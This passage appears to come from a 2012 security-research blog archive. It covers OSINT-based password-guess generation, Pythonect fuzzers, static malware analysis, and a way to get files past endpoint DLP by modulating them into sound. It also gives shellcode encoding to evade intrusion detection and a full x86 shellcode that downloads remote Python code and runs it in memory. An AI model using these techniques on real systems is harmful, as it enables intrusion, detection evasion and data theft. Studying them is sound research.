The code above will generate and print every 4 characters password from the letters: i, t, z, k, o, t, l , e, r. However, it won't cover passwords with uppercase letters in it. And so, here's a simple and straightforward implementation of a cycle_uppercase function that cycles the input letters yields a copy of the input with letter in uppercase:

def cycle_uppercase(i):
    s = ''.join(i)
    for idx in xrange(0, len(s)):
        yield s[:idx] + s[idx].upper() + s[idx+1:]

To use it, save it to a file called itertools2.py, and then simply add it to the Pythonect program after the itertools.product(_, repeat=4) block, as follows:

"Pythonect" -> scraper.get_all_employees_by_company_via_linkedin \
    -> string.lower(''.join(_.split())) \
        -> itertools.product(_, repeat=4) \
            -> itertools2.cycle_uppercase \
                -> print

Now, the program will also cover passwords that include a single uppercase letter in it. Moving on with the data manipulation, sometimes the password might contain symbols that are not found within the scrapped data. In this case, it is necessary to build a generator that will take the input and add symbols to it. Here is a short and simple generator implemented as a Generator Expression:

[_ + postfix for postfix in ['123','!','$']]

To use it, simply add it to the Pythonect program after the itertools2.cycle_uppercase block, as follows:

"Pythonect" -> scraper.get_all_employees_by_company_via_linkedin \
    -> string.lower(''.join(_.split())) \
        -> itertools.product(_, repeat=4) \
            -> itertools2.cycle_uppercase \
                -> [_ + postfix for postfix in ['123','!','$']] \
                    -> print

The result is that now the program adds the strings: '123', '!', and '$' to every generated password, which increases the chances of guessing the user's right password, or not, depends on the password :)

To summarize, it's possible to take OSINT/WEBINT data on a given person or company and use it to generate potential passwords, and it's easy to do with Pythonect. There are, of course, many different ways to manipulate the data into passwords and many programs and filters that can be used. In this aspect, Pythonect being a flow-oriented language makes it easy to experiment and research with different modules and programs in a "plug and play" manner.

Fuzzing Like A Boss with Pythonect

2012-09-17T11:31:00.000+03:00

In my previous post Automated Static Malware Analysis with Pythonect, I wrote about how to use Pythonect to automate static malware analysis. In this post I'll describe how to use Pythonect and all of its perks to fuzz file formats, network protocols, and command line arguments. The examples provided are only a sampling of what can be done. There are, obviously many more possibilities and you are encouraged to experiment. Before you read this tutorial you should have at least a basic knowledge of Fuzz testing, Python and Pythonect (I recommend reading the Pythonect Tutorial: Learn By Example).

Let's see some code!

['A', 'a', '0', '!', '$', '%', '*', '+', ',', '-', '.', '/', ':', '?', '@', '^', '_'] \
    -> [_ * n for n in [256, 512, 1024, 2048, 4096]] \
        -> os.system('/bin/ping ' + _)

The code above tries to fuzz the command-line arguments of a *nix command-line tool (e.g. /bin/ping). Let's go line by line and explain what's going on with these 3 lines of code.

The first line defines a list of inputs to try (i.e. ['A', 'a', '0', ...]]), the second line defines a list of length parameters (i.e. [256, 512, 1024, ...]), and the last line executes the command-line tool with the generated argument as argv[1] (e.g. /bin/ping "AAAAAA ... 250 times"). In addition, this fuzzer is multi-threaded and uses asynchronous communication. What does it mean? It means that it's not waiting for a thread to finish before continuing with the loop, and as a result, it's not guaranteed to fuzz in sorted order (.e. A * 255, A * 512, A * 1024, ...)

You can easily extend the code above to include testing for format string vulnerabilities:

['%s', '%n', 'A', 'a', '0', '!', '$', '%', '*', '+', ',', '-', '.', '/', ':', '?', '@', '^', '_'] \
    -> [_ * n for n in [256, 512, 1024, 2048, 4096]] \
        -> os.system('/bin/ping ' + _)

If you want the format string testing inputs to run first (i.e. fuzz in sorted order), change the forward pipe operator from asynchronous to synchronous:

['%s', '%n', 'A', 'a', '0', '!', '$', '%', '*', '+', ',', '-', '.', '/', ':', '?', '@', '^', '_'] \
    | [_ * n for n in [256, 512, 1024, 2048, 4096]] \
        -> os.system('/bin/ping ' + _)

If you also want the length parameters to run in sorted order (i.e. '%s' * 256, '%s' * 512, '%s' * 1024, ...), change the 2nd forward pipe operator to synchronous as well:

['%s', '%n', 'A', 'a', '0', '!', '$', '%', '*', '+', ',', '-', '.', '/', ':', '?', '@', '^', '_'] \
    | [_ * n for n in [256, 512, 1024, 2048, 4096]] \
        | os.system('/bin/ping ' + _)

Keep in mind, that the latter is no longer multi-threaded (due to the fact that it's waiting for both, the inputs and length threads to finish).

Moving on, here is an example of a generic file format fuzzer:

open('dana.jpg', 'r').read() \
    -> itertools.permutations \
        -> open('output_' + hex(_.__hash__()) + '.jpg', 'w').write(''.join(_))

The code above reads the content of dana.jpg and passes it to itertools.permutations, and that in turn returns dana.jpg-length tuples, all possible orderings, no repeated elements.
Each dana.jpg-length tuple is saved into a unique output_ prefixed file. Afterwards, testing the JPEG libraries is as easy as: eog *.jpg or zgv *.jpg

This is another example of a generic file format fuzzer:

open('dana.jpg', 'r').read() \
    -> [list(_) + [os.urandom(1) for n in xrange(0, len(_))]] \
        -> [tuple(random.sample(_, len(_)/2)) for i in xrange(0, len(_)*2)] \
            -> open('output_' + hex(_.__hash__()) + '.jpg', 'w').write(''.join(_))

The code above reads the content of dana.jpg, generates a dana.jpg-length random bytes buffer, joins them, and then randomly samples dana.jpg-length*2 dana.jpg-length chunks.
Each dana.jpg-length chunk is saved into a unique output_ prefixed file. Again, testing the JPEG libraries is as easy as: eog *.jpg or zgv *.jpg

Last but not least, here's a network protocol (FTP) fuzzer:

ftplib.FTP('localhost') \
    -> _.login().startswith('230') \
    -> [_.mkd(s) for s in reduce(lambda x,y: x+y, map(lambda c: [chr(c) * 2**l for l in range(8,13)], xrange(1, 255)))]

The code above uses ftplib module to connect to a FTP site, logins as an anonymous, generates strings from byte value 1-255 * 256, 512 and etc. and passes each string as pathname for MKD.

Lastly, if you have suggestions on how we can make Pythonect better, head over to Pythonect's github page and create a new ticket or fork. Enjoy the examples and have fun with Pythonect!

Automated Static Malware Analysis with Pythonect

2012-08-21T11:44:00.000+03:00

About 5 months ago I have released the first version of Pythonect - a new, experimental, general-purpose high-level dataflow programming language based on Python, written in Python.
It aims to combine the intuitive feel of shell scripting (and all of its perks like implicit parallelism) with the flexibility and agility of Python.

Crazy? Most definitely. And yet, strangely enough, it works!

Pythonect, being a dataflow programming language, treats data as something that originates from a source, flows through a number of processing components, and arrives at some final destination.
As such, it is most suitable for creating applications that are themselves focused on the "flow" of data. Perhaps the most readily available example of a dataflow-oriented applications comes from the realm of real-time signal processing, e.g. a video signal processor which perhaps starts with a video input, modifies it through a number of processing components (video filters), and finally outputs it to a video display.

As with video, malware analysis can be expressed as a network of different components such as: disassemblers, regular expressions, debuggers and etc. that are connected by a number of communication channels.
The benefits, and perhaps the greatest incentives, of expressing malware analysis this way is scalability and parallelism. The different components in the network can be maneuvered to create entirely unique dataflows without necessarily requiring the relationship to be hardcoded. Also, the design and concept of components make it easier to run on distributed systems and parallel processors.

In this tutorial I will show you how to automate static malware analysis using Pythonect. The examples will be simple enough that you can extend them if you want to.
Before you read this tutorial you should have at least a basic knowledge of x86 Assembly, Python, and Pythonect (I recommend reading the Pythonect Tutorial: Learn By Example).

Note: I have decided to go with static malware analysis because it's easier to demonstrate, and to use open source tools because they are more accessible. Nonetheless, this does not go to show that Pythonect or dataflow programming cannot be used to automate dynamic malware analysis, or integrated with a commercial software. The only limit is your imagination.

There isn't exactly a "Hello, world" program in the malware analysis realm, so I will start with my equivalent to "Hello, world", an example program that computes a MD5 digest of a file:

"MALWARE.EXE" -> os.system("/usr/bin/md5sum " + _)

The program above uses the md5sum program of GNU coreutils to compute and print MALWARE.EXE's MD5 digest. Let's extend it to compute the MALWARE.EXE's SHA1 digest as well:

"MALWARE.EXE" -> [os.system("/usr/bin/md5sum " + _), os.system("/usr/bin/sha1sum " + _)]

The new program above uses the md5sum and sha1sum of GNU coreutils to compute and print MALWARE.EXE's MD5 and SHA1 digests. Let's keep improving it:

sys.argv[1] -> [os.system("/usr/bin/md5sum " + _), os.system("/usr/bin/sha1sum " + _)]

Now, the new program reads the malware filename from a command-line argument. To run the script just save it (e.g. md5_and_sha1_sums) and run the Pythonect interpreter like this:

% /usr/local/bin/pythonect md5_and_sha1_sums /bin/ls
92385e9b8864032488e253ebde0534c3  /bin/ls
8800fee57584ed1c44b638225c2f1eec818a27c2  /bin/ls

Often, the goal is to handle the large volume of malware samples collected each day, let's change the program to work on all the executables (i.e. *.EXE) in the current directory:

glob.glob('*.EXE') -> [os.system("/usr/bin/md5sum " + _), os.system("/usr/bin/sha1sum " + _)]

Of course it can be further finetuned or customized at will. Also, it's worth mentioning that the program above is multi-threaded. Meaning, each file starts a new thread.

So far, I have used Python's os.system() function in all of the example programs. The os.system() is handy when it comes to writing small scripts, it executes a command in a subshell and returns it's exit status.
But since there is little interest in passing the exit status to another component, a different command executing function will be needed when building an advanced script. subprocess.check_output().

"MALWARE.EXE" -> subprocess.check_output(['/usr/bin/md5sum', _]) -> print

Much like the original example program, the program above uses the md5sum program of GNU coreutils to compute MALWARE.EXE's MD5 digest, but prints the result using Pythonect's print() function.

Moving on. The Python Standard Library is a rich set of libraries (modules and packages) for tackling just about every programming task. For example:

"MALWARE.EXE" -> open(_, 'r').read() -> hashlib.md5 -> _.hexdigest() -> print

The program above is an alternative to the original example program, it uses Python's hashlib.md5() module to compute and MALWARE.EXE's MD5 digest and Pythonect's print() to display it. What else?

"MALWARE.EXE" \
    -> open(_, 'r').read() \
    -> [re.finditer("\xcc", _), re.finditer("\xcd\x03", _)] \
    -> print "Found INT3 between Offset #%d and #%d" % _.span(0)

The program above searches for all the INT 3 instructions occurrences in MALWARE.EXE file, and prints the offsets of the beginning and end of each matched record.

Now, for the times when the Python Standard Library don't have what you looking for. You can always implement your own in Python:

import math

def entropy(data):
    entropy = 0
    if data:
        for x in range(2**8):
            p_x = float(data.count(chr(x))) / len(data)
            if p_x > 0:
                entropy += - p_x * math.log(p_x, 2)
    return entropy

The above is an implementation of Shannon's entropy equation in Python. To use it, simply save it (e.g. entropy.py), and reference it in a program:

"MALWARE.EXE" -> open(_, 'r').read() -> entropy.entropy -> print

The program above uses entropy() of entropy.py to measure and print MALWARE.EXE's entropy. To conclude this tutorial, let's tweak it one more time:

"MALWARE.EXE" -> subprocess.check_output(['/usr/bin/objcopy', '-O', 'binary', '-j', '.text', _, '/dev/stdout']) -> entropy.entropy -> print

Now, the program above uses entropy() of entropy.py to measure and print MALWARE.EXE's .text section (using objcopy of GNU binutils) entropy.

Pythonect is still under heavy development, there's a ton of unimplemented features and even more bugs. It's not ready for production yet, but you still can start to play with it and have plenty of fun!

That's all for now.

Modulation and Data Loss Prevention (DLP) Solutions

2012-07-08T18:29:00.001+03:00

Last year, my colleague Iftach (Ian) Amit and I gave a talk called 'Sounds Like Botnets' at DEFCON 19 and BSides Las Vegas conferences. Here is a link to the slides [PDF].
In the talk, we demonstrated how a combination of modulation and VoIP can be used to bypass enterprise security controllers. Here are the links to the poc #1, and poc #2.
This year, I won't be able to make it to Las Vegas for any of the conferences. Dwelling on the past, I have decided to revisit the 'Sounds Like Botnets' talk and add some content to it.

Data loss prevention (DLP) solutions are designed to detect and prevent potential data breach incidents. There are many types of DLP systems, the one that I'll address is the Endpoint DLP software.
Endpoint DLP software runs on an end-user workstations and monitors and controls access to physical devices (e.g. mobile devices) among other things. But does it monitor the sound card?
It is possible to modulate data into sound, and than to play it out from the workstation (using the sound card) to a 3rd party such as a voice recorder or any mobile with external microphone input.

Modulation vs. DLP #1:

Keep in mind that this is a proof of concept, so it's not going to work 100% of the time. If it's not working, try: (a) a smaller document/payload or (b) a different recording device.

To modulate:

Download data2sound.py
Pick a file
Modulate the file

$ ./data2sound.py -i secret.txt -o foobar.wav

Connect the recording device to the workstation sound card (Headphones output)
Start recording on the recording device
Play the generated WAV file (i.e. foobar.wav)
Stop the recording on the recording device

To demodulate:

Download sound2data.py

$ ./sound2data.py -i foobar.wav -o secret.txt

Connect the recording device to the workstation sound card (Microphone input)
Start recording on the workstation
Play the file on the recording device
Stop the recording on the workstation
Demodulate the file

Try this (at home, and at your own risk) and post a comment with what file and sound card equipment you tried, and whether it worked for you or not. Now, the next method is really more theory than practice.

Modulation vs. DLP #2:

By bridging between the computer soundcard and a smart phone broadband modem, it is possible to upgrade the previous method to be an on-line, or real time one. In other words, Build Your Own Modem.

The setup:

Connect the computer headphone output into the smart phone external microphone input. This way, the computer can output signal to the smart phone.
Connect the smart phone headphone output into the computer external microphone input. This way, the smart phone can output signal to the computer.

This should (in theory) make sure that a signal can go from side to side. Now, let's see what each side should do.

On the smart phone:

Call to the remote site
(The caller signal should be sent to the computer via headphone output, if not, try playing with the settings)
(The calle signal should be received from the computer via microphone input, if not, try playing with the settings)

There's also the option of pairing (via Bluetooth) the computer and the smart phone: The computer identifies as a headset and gains access to smart phone speaker/microphone. But it's preventable by DLP.

On the computer:

Modulate the file you wish to trasnfer
Play the generated WAV file

That's the basic idea, of course, you can install a software on the computer which will modulate-demoulate (i.e. MODEM) on the fly, making it possible to get transmission from the remote site and respond to it.

Before wrapping up this post, I'd like to give a big shout out to Mickey Shaktov and Iftach (Ian) Amit, each of them will be presenting this year at Blackhat USA. Go see their talks, you won't be disappointed!

Decoderless Shellcode Encoding

2012-06-23T19:47:00.000+03:00

Today, it's almost impossible to send an unencoded exploit payload over the wire without triggering a Network Intrusion Prevention System (IPS) or Network Intrusion Detection System (NIDS) on the way.
The obvious solution is to encode the payload before sending it. A typical encoder yields a new payload that contains both, the old payload encoded and a decoder function to decode it.
Now, the encoded payload is "free" of any malicious patterns so it won't trigger any alarm, but what about the decoder? It becomes the weakest link and the new trigger for alarm.

Almost every encoding method requires a decoder to be embedded in the payload. The tricky part is how to encode the decoder so it won't trigger any alarm? And is it even possible?
The short answer is Yes, there are some ways to do it, one of them is instruction substitution. In other words, replacing an instruction with semantically equivalent, but different instruction.
But if instruction substitution is good enough for encoding decoders, is it not good enough for encoding the payload itself? Yes, it is good enough to encode the payload as well.
By applying instruction substitution on a payload, the result is, an encoded payload with no decoder in it. A decoderless encoded shellcode.

Let's take the following shellcode (execve "/bin/sh", 23 bytes) as an input:

.section .text
.global _start
_start:
    push $0xb
    popl %eax
    cdq
    push %edx
    push $0x68732f2f
    push $0x6e69622f
    mov %esp,%ebx
    push %edx
    push %ebx
    mov %esp, %ecx
    int $0x80

The first instruction is:

push $0xb

The goal of this instruction is to store the byte 0xB in the stack. One way to encode this instruction will be:

push $0xc
decb (%esp)

This way, the value (i.e. 0xB) is no longer visible. Another way to encode this instruction will be:

sub $0x4, %esp
movl $0xfffffff4, (%esp)
notl (%esp)

Here, the PUSH instruction is no longer visible. The reason I'm using 0xFFFFFFF4 (i.e. -12, ~0xB) and not 0xB is to avoid NULL bytes, but if NULL is not a problem then:

sub $0x4, %esp
movl $0x0000000b, (%esp)

Now, not only single instructions can be encoded. It's also possible to group a few instructions together and encode it. For example:

push $0xb
popl %eax

The goal of this instruction group is to store the value 0x0000000B in register EAX. One way to encode it will be:

movl $0xfffffff4, %eax
xorl %eax, $0xfff31337

This way, the value (i.e. 0xB, or 0x0000000B) is no longer visible. Another way to encode this instruction group will be:

pusha
movl $0xfffffff4, 0x1c(%esp)
notl 0x1c(%esp)
popa

Here, both, the referenced register (i.e. EAX) and the value (i.e. 0xB, or 0x0000000B) are not visible.
The advantage of this approach is that it can be recursive, each output can be used as input for another pass. For example:

push $0xb

Yields:

push $0xc
decb (%esp)

That can yield:

sub $0x4, %esp
movl $0xfffffff3, (%esp)
notl (%esp)
decb (%esp)

And so on.
The disadvantage of this approach is that it's not size-oriented (output might be bigger than input) and it will not work on all the instructions set (e.g. INT).

Several years ago I have developed and released a program in Python called shcfuscator (read: shellcode obfuscator) to automate this very process.
Shcfuscator takes an input assembly program in GAS syntax, substitutes popular instructions, and outputs an assembly program in GAS syntax.
Nothing much happened with it, and I didn't follow-up on it, until recently, when I thought about it again and decided to write this post.

So, if anybody is interested in porting it Metasploit as en encoder module, please let me know - I'd be happy to help out!

Following this legacy project, I have decided to open a repository for other legacy projects that I have developed in the early-mid 2000's

The repository can be found at: https://github.com/ikotler/tty64

I am not planning on maintain it, but nonetheless feel free free to fork.

Linux/x86 Execve Python Interpreter with a Python Program Passed in as String Shellcode

2012-05-17T13:04:00.000+03:00

About a month ago, Phrack magazine #68 was released and a linux x86 shellcode (bindshell-tcp-fork.s) that I wrote a few years ago got mentioned in one of the articles.
This made me feel nostalgic and I have decided to pack all the shellcodes that I have written over the years into a tarball (linux_x86_shellcodes.tar.gz) and re-publish it.
The feedback I got was great, and it inspired me to go and write a new shellcode. So, I did.
I have written a new linux x86 execve() shellcode that executes the Python interpreter with a Python program passed in as string.

Why calling Python and not /bin/sh you ask? Because Python script makes it easier to customize and/or automate a penetration testing (especially post exploitation).
Python is a cross-platform programming language with a decent standard library, and is known to run on almost any operating system or hardware platform.
A Python script can query the OS, CPU, HOSTNAME, and even IP address, and based on this information to call different functions and/or use different parameters.
Shell script, as good as it may be, is still dependent on various binaries to be installed beforehand to be able to run successfully. Also, shell scripts are not cross-platform.

Let's have a look on how it works. Here's the shellcode source code:

.section .text
.global _start
_start:
        push  $0xb
        pop   %eax
        cdq
        push  %edx
        push  $0x20292763
        push  $0x65786527
        push  $0x2c273e67
        push  $0x6e697274
        push  $0x733c272c
        push  $0x29286461
        push  $0x65722e29
        push  $0x2779702e
        push  $0x646c726f
        push  $0x776f6c6c
        push  $0x65682f32
        push  $0x34323834
        push  $0x3639322f
        push  $0x752f6d6f
        push  $0x632e786f
        push  $0x62706f72
        push  $0x642e6c64
        push  $0x2f2f3a70
        push  $0x74746827
        push  $0x286e6570
        push  $0x6f6c7275
        push  $0x2e326269
        push  $0x6c6c7275
        push  $0x28656c69
        push  $0x706d6f63
        push  $0x20636578
        push  $0x653b3262
        push  $0x696c6c72
        push  $0x75207472
        push  $0x6f706d69
        mov   %esp, %esi
        push  %edx
        pushw $0x632d
        mov   %esp, %ecx
        push  %edx
        push  $0x6e6f6874
        push  $0x79702f6e
        push  $0x69622f72
        push  $0x73752f2f
        mov   %esp,%ebx
        push  %edx
        push  %esi
        push  %ecx
        push  %ebx
        mov   %esp,%ecx
        int   $0x80

What the shellcode does is call execve() syscall with '/usr/bin/python' as the filename argument, and '-c' and a one-line Python program as the argv array argument.
There's no need for a cleanup code, as execve() does not return on success, and the text, data, bss, and stack of the calling process are overwritten by that of the program loaded.

Here is the Python one-line program source code:

import urllib2 ; exec compile(urllib2.urlopen('http://ikotler.org/helloworld.py').read(), '<string>', 'exec')

What the Python program does is import the urllib2 library and use it to retrieve a Python script from a remote Web server, and then compiles and executes it on the fly.
More to it, The retrieved Python script remains in memory the whole time. The Python program does all of the above without writing any data to the hard drive.

Here is the retrieved Python script (i.e. helloworld.py) source code:

print "Hello, world"

Depending on the nature of the retrieved Python script, it might be enough to just use eval() instead of exec and compile() combination in the one-line Python program.
In this case, print is a statement in Python 2.x and as such it can not be evaluated using eval(). in Python 3, print() is a function and can be evaluated using eval().
If in doubt, always use the exec and compile() combination.

To compile the shellcode source and test it:

$ as -o python-execve-urllib2-exec.o python-execve-urllib2-exec.s
$ ld -o python-execve-urllib2-exec python-execve-urllib2-exec.o
$ ./python-execve-urllib2-exec

The output should be:

Hello, world

Here is the shellcode represented as a hex string within a C program:

char shellcode[] =

        "\x6a\x0b"              // push  $0xb
        "\x58"                  // pop   %eax
        "\x99"                  // cdq
        "\x52"                  // push  %edx
        "\x68\x63\x27\x29\x20"  // push  $0x20292763
        "\x68\x27\x65\x78\x65"  // push  $0x65786527
        "\x68\x67\x3e\x27\x2c"  // push  $0x2c273e67
        "\x68\x74\x72\x69\x6e"  // push  $0x6e697274
        "\x68\x2c\x27\x3c\x73"  // push  $0x733c272c
        "\x68\x61\x64\x28\x29"  // push  $0x29286461
        "\x68\x29\x2e\x72\x65"  // push  $0x65722e29
        "\x68\x2e\x70\x79\x27"  // push  $0x2779702e
        "\x68\x6f\x72\x6c\x64"  // push  $0x646c726f
        "\x68\x6c\x6c\x6f\x77"  // push  $0x776f6c6c
        "\x68\x32\x2f\x68\x65"  // push  $0x65682f32
        "\x68\x34\x38\x32\x34"  // push  $0x34323834
        "\x68\x2f\x32\x39\x36"  // push  $0x3639322f
        "\x68\x6f\x6d\x2f\x75"  // push  $0x752f6d6f
        "\x68\x6f\x78\x2e\x63"  // push  $0x632e786f
        "\x68\x72\x6f\x70\x62"  // push  $0x62706f72
        "\x68\x64\x6c\x2e\x64"  // push  $0x642e6c64
        "\x68\x70\x3a\x2f\x2f"  // push  $0x2f2f3a70
        "\x68\x27\x68\x74\x74"  // push  $0x74746827
        "\x68\x70\x65\x6e\x28"  // push  $0x286e6570
        "\x68\x75\x72\x6c\x6f"  // push  $0x6f6c7275
        "\x68\x69\x62\x32\x2e"  // push  $0x696c6c72
        "\x68\x75\x72\x6c\x6c"  // push  $0x6c6c7275
        "\x68\x69\x6c\x65\x28"  // push  $0x28656c69
        "\x68\x63\x6f\x6d\x70"  // push  $0x706d6f63
        "\x68\x78\x65\x63\x20"  // push  $0x20636578
        "\x68\x62\x32\x3b\x65"  // push  $0x653b3262
        "\x68\x72\x6c\x6c\x69"  // push  $0x696c6c72
        "\x68\x72\x74\x20\x75"  // push  $0x75207472
        "\x68\x69\x6d\x70\x6f"  // push  $0x6f706d69
        "\x89\xe6"              // mov   %esp,%esi
        "\x52"                  // push  %edx
        "\x66\x68\x2d\x63"      // pushw $0x632d
        "\x89\xe1"              // mov   %esp,%ecx
        "\x52"                  // push  %edx
        "\x68\x74\x68\x6f\x6e"  // push  $0x6e6f6874
        "\x68\x6e\x2f\x70\x79"  // push  $0x79702f6e
        "\x68\x72\x2f\x62\x69"  // push  $0x69622f72
        "\x68\x2f\x2f\x75\x73"  // push  $0x73752f2f
        "\x89\xe3"              // mov   %esp,%ebx
        "\x52"                  // push  %edx
        "\x56"                  // push  %esi
        "\x51"                  // push  %ecx
        "\x53"                  // push  %ebx
        "\x89\xe1"              // mov   %esp, %ecx
        "\xcd\x80";             // int   $0x80

int main(int argc, char **argv) {
        int *ret;
        ret = (int *)&ret + 2;
        (*ret) = (int) shellcode;
}

Again, to run and test it is as easy as:

$ gcc -o python-execve-urllib2-exec python-execve-urllib2-exec.c
$ ./python-execve-urllib2-exec

The output should be the same:

Hello, world

Now, I have also decided to open a GitHub repository to host the collection of shellcodes that I have written in the past, as well as any that I may write in the future.
I have committed both .S, and .C versions of this shellcode to it, as well as the rest of the shellcodes from the tarball.

The repository can be found at: https://github.com/ikotler/shellcode

Feel free to fork, and if you wish, to submit a pull-request and fix bug or suggest a change.